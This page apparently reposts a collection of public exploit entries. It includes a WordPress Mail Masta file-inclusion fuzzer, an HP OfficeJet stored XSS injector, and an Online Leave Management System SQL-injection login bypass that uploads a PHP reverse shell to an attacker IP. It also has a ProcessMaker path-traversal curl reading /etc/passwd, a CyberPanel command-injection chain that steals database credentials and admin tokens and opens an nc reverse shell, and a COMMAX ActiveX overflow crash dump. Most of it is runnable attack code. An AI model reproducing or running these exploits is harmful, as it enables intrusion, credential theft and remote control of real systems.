All posts by ISHACK AI BOT
-
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
# Date: 2021-08-24
# Exploit Author: Matheus Alexandre [Xcatolin]
# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
# Version: 1.0

WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.

* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one I used at Github: https://github.com/Xcatolin/Personal-Exploits/

#!/usr/bin/python
# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability

import requests
from requests.exceptions import ConnectionError

class bcolors:
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    ITALIC = '\33[3m'

print(bcolors.BOLD + """\
 __  __      _ _      __  __         _
|  \/  |__ _(_) |___ |  \/  |__ _ __| |_ __ _
| |\/| / _` | | |___|| |\/| / _` (_-<  _/ _` |
|_|  |_\__,_|_|_|    |_|  |_\__,_/__/\__\__,_|
 _                 _   ___ _ _       ___          _        _
| |   ___  __ __ _| | | __(_) |___  |_ _|_ _  __| |_  _ __(_)___ _ _
| |__/ _ \/ _/ _` | | | _|| | / -_)  | || ' \/ _| | || (_-< / _ \ ' \\
|____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
|_  .  \_/  _  _ _|_  _ | .  _
|_)\/. / \(_(_||_(_)||| )
   /
""" + bcolors.ENDC)

endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"

print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
target = raw_input("~# ")

print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
try:
    request = requests.get(target)
except ConnectionError:
    print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
    exit(1)
else:
    print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
response = requests.get(target + valid)
# A response shorter than 1000 bytes means /etc/passwd was not included
if len(response.content) < 1000 :
    print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
    exit(1)
else:
    print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)

print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
wordlist='wordlist.txt'  ## Change here
lines=open(wordlist, "r").readlines()
for i in range(0, len(lines)):
    word=lines[i].replace("\n","")
    response = requests.get(target + endpoint + word)
    if len(response.content) > 500 :
        print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
-
HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)
# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
# Date: 01/08/2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www8.hp.com/
# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
# Version: HP OfficeJet 7110 Wide Format ePrinter
# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A

# PoC:

import requests
import json
from requests.exceptions import HTTPError

target = 'http://192.168.223.1'                  # The IP of the vulnerable target
payload = '''<script>alert('XSS');</script>'''  # The XSS injection payload you want to use
path='/DevMgmt/ProductConfigDyn.xml'            # Path location of the PUT command

pre = '''
<?xml version="1.0" encoding="UTF-8"?>
<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
<prdcfgdyn2:ProductSettings>
<prdcfgdyn:DeviceInformation>
<dd:DeviceLocation>
'''  # The start of the request body

post = '''
</dd:DeviceLocation>
</prdcfgdyn:DeviceInformation>
</prdcfgdyn2:ProductSettings>
</prdcfgdyn2:ProductConfigDyn>
'''  # The end of the request body

body = pre + payload + post

headers = {
    'Host':'192.168.223.1',
    'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
    'Accept':'*/*',
    'Accept-Language':'en-US,en;q=0.5',
    'Accept-Encoding':'gzip, deflate',
    'Content-Type':'text/xml',
    'Content-Length':str(len(body.encode('utf-8'))),
    'Origin':'https://192.168.223.1',
    'Connection':'close',
    'Referer':target,
}

print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')

try:
    print('{!} Injecting payload :',payload)
    response = requests.put(target+path, headers = headers, data = body)
    response.raise_for_status()
except HTTPError as http_err:
    print('{X}',f'HTTP error occurred: {http_err}')
except Exception as err:
    print('{X}',f'Other error occurred: {err}')
else:
    print('{!} Success!')
-
Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 24-08-2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
# Version: V1
# Category: Webapps
# Tested on: Linux

#!/bin/env python3

import requests
import time
import sys
from colorama import Fore, Style

if len(sys.argv) != 4:
    print('python3 script.py <target url> <attacker ip> <attacker port>')
    print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444')
    exit()
else:
    try:
        url = sys.argv[1]
        attacker_ip = sys.argv[2]
        attacker_port = sys.argv[3]
        print()
        print('[*] Trying to login...')
        time.sleep(1)
        login = url + '/classes/Login.php?f=login'
        payload_name = "reverse_shell.php"
        payload_file = r"""<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port)
        session = requests.session()
        post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"}
        user_login = session.post(login, data=post_data)
        cookie = session.cookies.get_dict()
        if user_login.text == '{"status":"success"}':
            print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
            upload_url = url + "/classes/Users.php?f=save"
            cookies = cookie
            headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                       "Accept": "*/*",
                       "Accept-Language": "en-US,en;q=0.5",
                       "Accept-Encoding": "gzip, deflate",
                       "X-Requested-With": "XMLHttpRequest",
                       "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112",
                       "Origin": "http://localhost",
                       "Connection": "close",
                       "Referer": "http://localhost/leave_system/admin/?page=user"}
            data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name + "\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
            print('[*] Trying to Upload Reverse Shell...')
            time.sleep(2)
            try:
                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!')
                upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
                upload_check = f'{url}/uploads'
                r = requests.get(upload_check)
                if payload_name in r.text:
                    payloads = r.text.split('<a href="')
                    for load in payloads:
                        if payload_name in load:
                            payload = load.split('"')
                            payload = payload[0]
                        else:
                            pass
                else:
                    exit()
            except:
                print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload failed try again in a little bit!!!!!!\n')
                exit()
            try:
                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your Listener!\n')
                connect_url = url + '/uploads/'
                r = requests.get(connect_url + payload)
            except:
                print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to find reverse shell check {connect_url} or try again!\n')
        else:
            print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login failed!\n')
    except:
        print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something Went Wrong!\n')
-
ProcessMaker 3.5.4 - Local File inclusion
# Exploit Title: ProcessMaker 3.5.4 - Local File inclusion
# Exploit Author: Ai Ho (@j3ssiejjj)
# Date: 16-04-2021
# Vendor Homepage: https://www.processmaker.com/
# Version: ProcessMaker <= 3.5.4
# References: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/process-maker-lfi.yaml

# PoC:

## With curl

curl -k --path-as-is 'http://targetIP/../../../..//etc/passwd'

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
--[snippets]--

## With Jaeles Scanner

jaeles scan -s ~/jaeles-signatures/common/process-maker-lfi.yaml -u http://targetIP
-
CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: <=2.1
# https://www.youtube.com/watch?v=J_8iLELVgkE

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated)
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password

import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
warnings.simplefilter('ignore',InsecureRequestWarning)

def init():
    parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
    parser.add_argument('-u','--host',help='Host', type=str, required=True)
    parser.add_argument('-l', '--login',help='Username', type=str, required=True)
    parser.add_argument('-p', '--password',help='Password', type=str, required=True)
    parser.add_argument('-f', '--file',help='File', type=str)
    args = parser.parse_args()
    exploit(args)

def exploit(args):
    def on_open(ws):
        verifyPath,socket_password
        print("[+] Socket connection successful")
        print("[+] Trying a reverse connection")
        ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
        ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
        ws.close()

    def on_close(ws, close_status_code, close_msg):
        print("[+] Successful")
        print("[!] Disconnect from socket")

    session = requests.Session()
    target = "https://{}:8090".format(args.host)
    username = args.login
    password = args.password
    print("[+] Target {}".format(target))
    response = session.get(target, verify=False)
    session_hand = session.cookies.get_dict()
    token = session_hand["csrftoken"]
    print("[+] Token {}".format(token))
    headers = {
        'X-Csrftoken': token,
        'Cookie': 'csrftoken={}'.format(token),
        'Referer': target
    }
    login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
    login_json = json.loads(login.content)
    if login_json["loginStatus"]:
        session_hand_login = session.cookies.get_dict()
        print("[+] Login Success")
        print("[+] Send request fetch websites list")
        headers = {
            'X-Csrftoken': session_hand_login["csrftoken"],
            'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
            'Referer': target
        }
        feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
        feth_weblist_json = json.loads(feth_weblist.content)
        if feth_weblist_json["data"]:
            weblist_json = json.loads(feth_weblist_json["data"])
            domain = weblist_json[0]["domain"]
            domain_folder = "/home/{}".format(domain)
            print("[+] Successfully {} selected".format(domain))
            print("[+] Creating ssh pub")
            remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
            create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
            create_ssh_json = json.loads(create_ssh.content)
            if create_ssh_json["status"]:
                key = create_ssh_json["deploymentKey"]
                print("[+] Key : {}".format(key))
                explode_key = key.split()
                explode_username = explode_key[-1].split("@")
                if explode_username[0]:
                    username = explode_username[0]
                    hostname = explode_username[1]
                    print("[+] {} username selected".format(username))
                    print("[+] Preparing for symlink attack")
                    print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
                    target_file = args.file
                    if not target_file:
                        target_file = "/root/.my.cnf"
                    domain_folder_ssh = "{}/.ssh".format(domain_folder)
                    command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
                    completeStartingPath = "{}';{};'".format(domain_folder,command)
                    #filemanager/controller - completeStartingPath - command execution vulnerability
                    symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                    symlink_json = json.loads(symlink.content)
                    if symlink_json["status"]:
                        print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
                        read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
                        read_file_json = json.loads(read_file.content)
                        read_file = read_file_json["deploymentKey"]
                        if not args.file:
                            print("-----------------------------------")
                            print(read_file.strip())
                            print("-----------------------------------")
                            mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
                            steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
                            print("[+] Fetching users tokens")
                            completeStartingPath = "{}';{}".format(domain_folder,steal_token)
                            steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
                            token_file = domain_folder+"/token.txt"
                            steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
                            leak = json.loads(steal_token_read_request.content)
                            leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
                            print("------------------------------")
                            for user in leak:
                                b64de = base64.b64decode(user).decode('utf-8')
                                exp_username = b64de.split(":")
                                if exp_username[0] == "admin":
                                    admin_password = exp_username[1]
                                print("[+] " + b64de)
                            print("------------------------------")
                            print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
                            print("[+] Try login admin")
                            headers = {
                                'X-Csrftoken': token,
                                'Cookie': 'csrftoken={}'.format(token),
                                'Referer': target
                            }
                            login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
                            login_json = json.loads(login_admin.content)
                            if login_json["loginStatus"]:
                                session_hand_login = session.cookies.get_dict()
                                print("[+] 4dm1n_l061n_5ucc355")
                                print("[+] c0nn3c71n6_70_73rm1n4l")
                                headers = {
                                    'X-Csrftoken': session_hand_login["csrftoken"],
                                    'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
                                    'Referer': target
                                }
                                get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
                                verifyPath = re.findall('id=\"verifyPath\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                socket_password = re.findall('id=\"password\">(.*?)</div>',str(get_websocket_token.content))[-1]
                                print("[+] verifyPath {}".format(verifyPath))
                                print("[+] socketPassword {}".format(socket_password))
                                print("[+] Trying to connect to socket")
                                ws = websocket.WebSocketApp("wss://{}:5678".format(args.host), on_open=on_open, on_close=on_close)
                                ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
                            else:
                                print("[-] Auto admin login failed")
                        else:
                            print(read_file)
                    else:
                        print("[-] Unexpected")
                else:
                    print("[-] Username selected failed")
            else:
                print("[-] Fail ssh pub")
        else:
            print("[-] List error")
    else:
        print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))

if __name__ == "__main__":
    init()
-
COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow

Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: 2.1.4.5

Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.

Desc: The vulnerability is caused due to a boundary error in the processing of user input, which can be exploited to cause a buffer overflow when a user inserts an overly long array of string bytes through several functions. Successful exploitation could allow execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php

02.08.2021

--

$ python
>>> "A"*1000 [ToTheClipboard]
>>> #Paste in ID or anywhere

(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001      mov     byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
  CRT scope  0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
                func:   ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
 # ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920  0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b  ...........vx.~.
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@..x. ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0:038:x86> d ebp
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@..x. ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0d78f9a0  8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00  ................
0:038:x86> d esi
41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:038:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ie_to_edge_bho.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Commax_WebViewer.OCX -
GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 41414141
Attempt to write to address 41414141

FAULTING_THREAD:  00005b30

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  IEXPLORE.EXE

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  41414141

FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

WRITE_ADDRESS:  41414141

WATSON_BKT_PROCSTAMP:  95286d96

WATSON_BKT_PROCVER:  11.0.19041.1

PROCESS_VER_PRODUCT:  Internet Explorer

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  1043bf

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  aadfa1c5bdd8f77b979f6a5b222994db450b715e

MODLIST_SHA1_HASH:  849cfdbdcb18d5749dc41f313fc544a643772db9

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 14:20:11.0116

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES:
OS_LOCALE:  ENU

PROBLEM_CLASSES:

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x5220]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

LAST_CONTROL_TRANSFER:  from 0b405dea to 0b4d43bf

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7

THREAD_SHA1_HASH_MOD_FUNC:  e84e62df4095d241971250198ae18de0797cfdc7

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  2033316a7c1a92aaeab1ce97e013350953fef546

THREAD_SHA1_HASH_MOD:  6d850af928076b326edbcafdf6dd4f771aafbab5

FAULT_INSTR_CODE:  458baaf3

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+f5501

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME:  CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821

STACK_COMMAND:  ~38s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL

